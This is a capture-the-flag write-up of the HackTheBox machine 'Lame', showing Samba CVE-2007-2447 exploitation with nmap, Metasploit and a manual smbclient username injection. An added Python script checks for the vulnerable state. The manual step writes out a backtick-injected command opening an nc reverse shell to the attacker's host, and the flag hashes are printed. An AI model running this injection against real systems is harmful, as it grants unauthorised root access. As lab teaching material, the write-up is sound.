HackTheBox · Medium
Lame
Classic HackTheBox machine exploiting a critical vulnerability in Samba 3.0.20 (CVE-2007-2447). The username map script command injection flaw grants immediate root access without privilege escalation. An excellent lesson in the importance of patch management.
Tags: nmap · metasploit · smbclient · CVE-2007-2447
Vulnerability Background
CVE-2007-2447 — Samba Username Map Script
Samba versions 3.0.0 through 3.0.25rc3 allow remote code execution when using the non-default "username map script" configuration option. By specifying a username containing shell metacharacters, attackers can execute arbitrary commands. The flaw requires no authentication and runs with the same privileges as the Samba daemon — typically root.
CVSS Score: 10.0 (Critical) — No auth required, remote code execution as root
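Because the flaw needs both an affected build (3.0.0 through 3.0.25rc3) and the non-default "username map script" option, a defender's first check is a two-part one. The script below is an added example, not part of the original writeup or of Samba: it parses a version banner such as the nmap line above and a minimal smb.conf, and reports whether a host sits in the exploitable state. Function names, the sample config and the script path in it are hypothetical.

```python
import re

# Affected range from the advisory text above: Samba 3.0.0 through 3.0.25rc3 (3.0.25 final is fixed).
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?")

def parse_samba_version(banner):
    """Return (major, minor, patch, rc) from text such as 'Samba smbd 3.0.20', or None."""
    m = VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    return int(major), int(minor), int(patch), (int(rc) if rc else None)

def version_in_cve_2007_2447_range(banner):
    """True when the banner version is 3.0.0 .. 3.0.25rc3 inclusive."""
    v = parse_samba_version(banner)
    if v is None or v[:2] != (3, 0):
        return False
    patch, rc = v[2], v[3]
    return patch < 25 or (patch == 25 and rc is not None and rc <= 3)

def username_map_script_enabled(smb_conf):
    """True if [global] sets a non-empty 'username map script', the option the flaw requires."""
    section = None
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue  # skip blanks and comments
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "global" and "=" in line:
            key, value = line.split("=", 1)
            if " ".join(key.split()).lower() == "username map script" and value.strip():
                return True
    return False

def assess(banner, smb_conf):
    """'exploitable' needs both conditions; a vulnerable build alone still needs patching."""
    vuln = version_in_cve_2007_2447_range(banner)
    if vuln and username_map_script_enabled(smb_conf):
        return "exploitable"
    return "vulnerable-version" if vuln else "not-affected"

# Constructed sample input (hypothetical host and script path, not this machine's real config).
SAMPLE_BANNER = "445/tcp open netbios-ssn Samba smbd 3.0.20"
SAMPLE_CONF = """[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh
"""
```

Run `assess(SAMPLE_BANNER, SAMPLE_CONF)` to get "exploitable"; feeding a banner like "Samba smbd 3.X - 4.X" returns "not-affected" because the version is not resolvable, so a fingerprint that vague should be followed up rather than trusted.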
1. Reconnaissance
Identify all running services and their versions — version detection is critical here.
$ nmap -sV -sC -p- --min-rate 5000 10.10.10.3
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X
445/tcp  open  netbios-ssn Samba smbd 3.0.20
3632/tcp open  distccd     distccd v1
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
Samba 3.0.20 — immediately matches CVE-2007-2447 version range
vsftpd 2.3.4 also has a backdoor (CVE-2011-2523) but it was patched on this machine
2. Exploitation
Use the Metasploit module for CVE-2007-2447 to get an instant root shell.
$ msfconsole
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 10.10.10.3
msf6 exploit(...) > set LHOST 10.10.14.x
msf6 exploit(...) > run
[*] Started reverse TCP handler on 10.10.14.x:4444
[*] Command shell session 1 opened
root@lame:/# # direct root shell — no privesc needed
Replicate the exploit manually using smbclient to understand the underlying mechanism.
# Start netcat listener
$ nc -lvnp 4444
# Exploit via smbclient — inject command in username field
$ smbclient //10.10.10.3/tmp \
-U "./=`nohup nc -e /bin/bash 10.10.14.x 4444`"
# Listener receives connection:
connect to [10.10.14.x] from (UNKNOWN) [10.10.10.3]
$ id
uid=0(root) gid=0(root)
The backtick injection in the username field is handed unsanitized to the shell through the username map script during authentication, which is what triggers command execution before any credentials are checked.
Post-Exploitation — Flags
root@lame:/# find / -name "*.txt" -path "*/home/*" 2>/dev/null
/home/makis/user.txt
root@lame:/# cat /home/makis/user.txt
69454a937d94f5f0225ea00acd2e84c5
root@lame:/# cat /root/root.txt
92caac3be140ef409e45721348a4e9df
Key Takeaways
Unpatched Samba 3.0.20 = instant root. This CVE is from 2007 — patch management is critical
Always check service versions in nmap output — a version number can reveal critical CVEs immediately
The attack chain was: scan → identify version → search CVE → exploit → root. No pivoting needed
Understanding manual exploitation (without Metasploit) shows how injection works at the protocol level